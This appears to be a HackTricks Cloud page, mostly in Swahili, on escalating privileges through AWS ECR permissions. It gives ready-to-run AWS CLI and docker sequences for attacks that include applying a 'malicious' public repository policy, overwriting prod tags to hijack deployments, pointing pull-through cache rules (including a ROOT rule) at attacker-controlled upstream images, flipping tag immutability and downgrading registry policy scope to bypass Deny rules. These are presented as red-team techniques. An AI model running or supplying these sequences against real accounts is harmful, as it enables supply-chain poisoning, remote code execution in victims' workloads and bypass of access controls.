AWS - ECR Privesc

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

ECR

`ecr:GetAuthorizationToken`,`ecr:BatchGetImage`

Mshambuliaji mwenye ecr:GetAuthorizationToken na ecr:BatchGetImage anaweza kuingia kwenye ECR na kupakua images.

For more info on how to download images:

AWS - ECR Post Exploitation

Athari Inayoweza Kutokea: Privesc isiyo ya moja kwa moja kwa kunasa taarifa nyeti katika trafiki.

`ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart`

Mshambuliaji mwenye ruhusa zote hizo anaweza kuingia kwenye ECR na kupakia images. Hii inaweza kutumika kuongeza ruhusa katika mazingira mengine ambapo images hizo zina tumika.

Zaidi ya hayo, ecr:PutImage inaweza kutumika kuandika tena tag iliyopo (kwa mfano stable / prod) kwa kupakia manifest tofauti ya image chini ya tag hiyo, na hivyo kuiba deployments zinazotegemea tag.

Hii inakuwa muhimu hasa wakati watumiaji wa downstream wanachukua deployments kwa tag na auto-refresh kwenye mabadiliko ya tag, kama:

Lambda container image functions (PackageType=Image) zinazorejea .../repo:stable
ECS services / Kubernetes workloads zinazovuta repo:prod (bila digest pinning)
CI/CD yoyote inayofanya redeploy kwa matukio ya ECR

Katika kesi hizo, kuandika tena tag kunaweza kusababisha remote code execution katika mazingira ya mteja na privilege escalation kwa IAM role inayotumika na workload hiyo (kwa mfano, role ya utekelezaji ya Lambda yenye secretsmanager:GetSecretValue).

To learn how to upload a new image/update one, check:

AWS - EKS Enum

`ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart`

Kama sehemu iliyotangulia, lakini kwa repositories za umma.

`ecr:SetRepositoryPolicy`

Mshambuliaji mwenye ruhusa hii anaweza kubadilisha sera ya repository ili kujipa yeye mwenyewe (au hata kila mtu) ufikiaji wa kusoma/kuandika.
Kwa mfano, katika mfano huu ufikiaji wa kusoma umepewa kila mtu.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Maudhui ya my-policy.json:

{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "allow public pull",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

`ecr-public:SetRepositoryPolicy`

Kama sehemu iliyopita, lakini kwa repositories za umma.
Mshambulizi anaweza kubadilisha sera ya repository ya ECR Public repository ili kumpa ufikiaji wa umma usioidhinishwa au kuinua ruhusa zao.

# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

Athari Inayowezekana: Ufikiaji wa umma usioidhinishwa wa ECR Public repository, ukiruhusu mtumiaji yeyote ku-push, ku-pull, au ku-delete images.

`ecr:PutRegistryPolicy`

Mvamizi mwenye ruhusa hii anaweza kubadilisha sera ya rejistri ili kujipa yeye mwenyewe, akaunti yake (au hata kila mtu) ufikiaji wa kusoma/kuandika.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

ecr:CreatePullThroughCacheRule

Abusu ECR Pull Through Cache (PTC) rules ili kupangia namespace ya upstream inayodhibitiwa na mshambuliaji kwa prefix ya trusted private ECR. Hii inafanya workloads zinazopakua kutoka private ECR kupokea picha za mshambuliaji kwa uwazi bila haja ya ku-push kwenda private ECR.

Required perms: ecr:CreatePullThroughCacheRule, ecr:DescribePullThroughCacheRules, ecr:DeletePullThroughCacheRule. If using ECR Public upstream: ecr-public:* to create/push to the public repo.
Tested upstream: public.ecr.aws

Steps (example):

Prepare attacker image in ECR Public

Get your ECR Public alias with: aws ecr-public describe-registries –region us-east-1

docker login public.ecr.aws/<public_alias> docker build -t public.ecr.aws/<public_alias>/hacktricks-ptc-demo:ptc-test . docker push public.ecr.aws/<public_alias>/hacktricks-ptc-demo:ptc-test

Create the PTC rule in private ECR to map a trusted prefix to the public registry aws ecr create-pull-through-cache-rule –region us-east-2 –ecr-repository-prefix ptc –upstream-registry-url public.ecr.aws
Pull the attacker image via the private ECR path (no push to private ECR was done) docker login <account_id>.dkr.ecr.us-east-2.amazonaws.com docker pull <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test docker run –rm <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test

Potential Impact: Uharibifu wa mnyororo wa usambazaji kwa kuingilia majina ya ndani ya images chini ya prefix iliyochaguliwa. Kazi yoyote inayopakua images kutoka private ECR ikitumia prefix hiyo itapokea maudhui yanayodhibitiwa na mshambuliaji.

`ecr:PutImageTagMutability`

Tumia vibaya ruhusa hii kugeuza repository yenye tag isiyobadilika (tag immutability) kuwa inaweza kubadilishwa (mutable) na kuandika tena tags zinazotegemewa (mf., latest, stable, prod) kwa maudhui yanayodhibitiwa na mshambuliaji.

Required perms: ecr:PutImageTagMutability plus push capabilities (ecr:GetAuthorizationToken, ecr:InitiateLayerUpload, ecr:UploadLayerPart, ecr:CompleteLayerUpload, ecr:PutImage).
Impact: Uharibifu wa mnyororo wa usambazaji kwa kubadilisha kimya kimya tags ambazo zilikuwa isiyobadilika bila kubadilisha majina ya tag.

Steps (example):

Chovya tag isiyobadilika kwa kubadili mutability

```bash REGION=us-east-1 REPO=ht-immutable-demo-$RANDOM aws ecr create-repository --region $REGION --repository-name $REPO --image-tag-mutability IMMUTABLE acct=$(aws sts get-caller-identity --query Account --output text) aws ecr get-login-password --region $REGION | docker login --username AWS --password-stdin ${acct}.dkr.ecr.${REGION}.amazonaws.com # Build and push initial trusted tag printf 'FROM alpine:3.19\nCMD echo V1\n' > Dockerfile && docker build -t ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod . && docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod # Attempt overwrite while IMMUTABLE (should fail) printf 'FROM alpine:3.19\nCMD echo V2\n' > Dockerfile && docker build -t ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod . && docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod # Flip to MUTABLE and overwrite aws ecr put-image-tag-mutability --region $REGION --repository-name $REPO --image-tag-mutability MUTABLE docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod # Validate consumers pulling by tag now get the poisoned image (prints V2) docker run --rm ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod ```

Hijack ya global registry kupitia ROOT Pull-Through Cache rule

Unda rule ya Pull-Through Cache (PTC) ukitumia ecrRepositoryPrefix=ROOT maalum ili kulinganisha mzizi wa private ECR registry na upstream public registry (mfano, ECR Public). Kuvuta yoyote kwa repository isiyokuwepo kwenye private registry kutatolewa kwa uwazi kutoka upstream, ikiruhusu supply-chain hijacking bila kulipakia kwenye private ECR.

Idhini zinazohitajika: ecr:CreatePullThroughCacheRule, ecr:DescribePullThroughCacheRules, ecr:DeletePullThroughCacheRule, ecr:GetAuthorizationToken.
Athari: Kuvutaji kwa <account>.dkr.ecr.<region>.amazonaws.com/<any-existing-upstream-path>:<tag> kutafanikiwa na kuunda moja kwa moja repositories binafsi zinazotokana na upstream.

Kumbuka: Kwa ROOT rules, msitumie --upstream-repository-prefix. Kuipatia itasababisha kosa la uthibitisho.

Demo (us-east-1, upstream public.ecr.aws)

```bash REGION=us-east-1 ACCT=$(aws sts get-caller-identity --query Account --output text)

1) Create ROOT PTC rule mapping to ECR Public (no upstream prefix)

aws ecr create-pull-through-cache-rule
–region “$REGION”
–ecr-repository-prefix ROOT
–upstream-registry-url public.ecr.aws

2) Authenticate to private ECR and pull via root path (triggers caching & auto repo creation)

aws ecr get-login-password –region “$REGION” | docker login –username AWS –password-stdin ${ACCT}.dkr.ecr.${REGION}.amazonaws.com

Example using an official mirror path hosted in ECR Public

(public.ecr.aws/docker/library/alpine:latest)

docker pull ${ACCT}.dkr.ecr.${REGION}.amazonaws.com/docker/library/alpine:latest

3) Verify repo and image now exist without any push

aws ecr describe-repositories –region “$REGION”
–query “repositories[?repositoryName==docker/library/alpine]” aws ecr list-images –region “$REGION” –repository-name docker/library/alpine –filter tagStatus=TAGGED

4) Cleanup

aws ecr delete-pull-through-cache-rule –region “$REGION” –ecr-repository-prefix ROOT aws ecr delete-repository –region “$REGION” –repository-name docker/library/alpine –force || true

</details>

### `ecr:PutAccountSetting` (Punguza `REGISTRY_POLICY_SCOPE` ili kuiepuka vizuizi vya registry policy)

Tumia `ecr:PutAccountSetting` kubadilisha scope ya registry policy kutoka `V2` (policy inayotumika kwa vitendo vyote vya ECR) hadi `V1` (policy inayotumika tu kwa `CreateRepository`, `ReplicateImage`, `BatchImportUpstreamImage`). Ikiwa registry policy yenye uzuiaji Deny inazuia vitendo kama `CreatePullThroughCacheRule`, kupunguza hadi `V1` kunafuta utekelezaji huo ili identity‑policy Allows zichukue nafasi.

- Idhini zinazohitajika: `ecr:PutAccountSetting`, `ecr:PutRegistryPolicy`, `ecr:GetRegistryPolicy`, `ecr:CreatePullThroughCacheRule`, `ecr:DescribePullThroughCacheRules`, `ecr:DeletePullThroughCacheRule`.
- Madhara: Uwezo wa kufanya vitendo vya ECR ambavyo awali vilizuiliwa na registry policy Deny (mfano, kuunda PTC rules) kwa kuweka scope kwa muda hadi `V1`.

Hatua (mfano):

<details>
<summary>Pitisha registry policy Deny kwenye CreatePullThroughCacheRule kwa kubadili hadi V1</summary>
```bash
REGION=us-east-1
ACCT=$(aws sts get-caller-identity --query Account --output text)

# 0) Snapshot current scope/policy (for restore)
aws ecr get-account-setting --name REGISTRY_POLICY_SCOPE --region $REGION || true
aws ecr get-registry-policy --region $REGION > /tmp/orig-registry-policy.json 2>/dev/null || echo '{}' > /tmp/orig-registry-policy.json

# 1) Ensure V2 and set a registry policy Deny for CreatePullThroughCacheRule
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V2 --region $REGION
cat > /tmp/deny-ptc.json <<'JSON'
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "DenyPTCAll",
"Effect": "Deny",
"Principal": "*",
"Action": ["ecr:CreatePullThroughCacheRule"],
"Resource": "*"
}
]
}
JSON
aws ecr put-registry-policy --policy-text file:///tmp/deny-ptc.json --region $REGION

# 2) Attempt to create a PTC rule (should FAIL under V2 due to Deny)
set +e
aws ecr create-pull-through-cache-rule \
--region $REGION \
--ecr-repository-prefix ptc-deny-test \
--upstream-registry-url public.ecr.aws
RC=$?
set -e
if [ "$RC" -eq 0 ]; then echo "UNEXPECTED: rule creation succeeded under V2 deny"; fi

# 3) Downgrade scope to V1 and retry (should SUCCEED now)
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V1 --region $REGION
aws ecr create-pull-through-cache-rule \
--region $REGION \
--ecr-repository-prefix ptc-deny-test \
--upstream-registry-url public.ecr.aws

# 4) Verify rule exists
aws ecr describe-pull-through-cache-rules --region $REGION \
--query "pullThroughCacheRules[?ecrRepositoryPrefix=='ptc-deny-test']"

# 5) Cleanup and restore
aws ecr delete-pull-through-cache-rule --region $REGION --ecr-repository-prefix ptc-deny-test || true
if jq -e '.registryPolicyText' /tmp/orig-registry-policy.json >/dev/null 2>&1; then
jq -r '.registryPolicyText' /tmp/orig-registry-policy.json > /tmp/_orig.txt
aws ecr put-registry-policy --region $REGION --policy-text file:///tmp/_orig.txt
else
aws ecr delete-registry-policy --region $REGION || true
fi
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V2 --region $REGION

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.